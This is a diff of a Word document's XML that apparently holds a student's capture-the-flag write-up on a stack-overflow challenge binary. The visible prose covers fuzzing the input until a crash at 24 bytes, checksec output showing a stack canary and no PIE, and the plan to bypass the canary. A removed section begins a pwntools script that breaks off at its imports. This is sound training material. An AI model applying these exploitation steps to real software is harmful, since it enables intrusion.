+        <w:t xml:space="preserve">. The user input is then converted to integer representation and stored in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variable. Then the program provides a hint in form of a hex value, which is a memory address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">on the location of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>. The program asks user not to overwrite its stack, and the program terminates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>I get the prompt: ‘What is the carrying capacity of a domestic canary?’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Assuming this is an obscure way of asking how much input it can take before crashing, I try several different amounts of data, and the program finally crashes at 24 A’s. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Observations: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Execution and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Disassembly</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Running </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>checksec ./02</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I see that there is a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>stack canary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> present. There is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>No PIE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>meaning</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it has been compiled </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">as a position dependent executable, as opposed to a position </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">independent </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">executable (PIE), which is neccessary to enable address space layout randomization (ASLR). ASLR is a security feature that makes sure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">executables </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>are loaded into random address locations in virtual memory each time the program is run, so no PIE is a good precondition for exploiting the program. H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>wever, we need to bypass the canary somehow.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3650,10 +4360,10 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="596FA3C5" wp14:editId="53E05C3D">
-            <wp:extent cx="5972810" cy="1351915"/>
-            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
-            <wp:docPr id="347535525" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687E554E" wp14:editId="519B7211">
+            <wp:extent cx="4305521" cy="1168460"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1185386941" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3661,1956 +4371,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="347535525" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5972810" cy="1351915"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Task 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="6A9955"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>#!/usr/bin/python3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>from</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>pwn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>import</w:t>
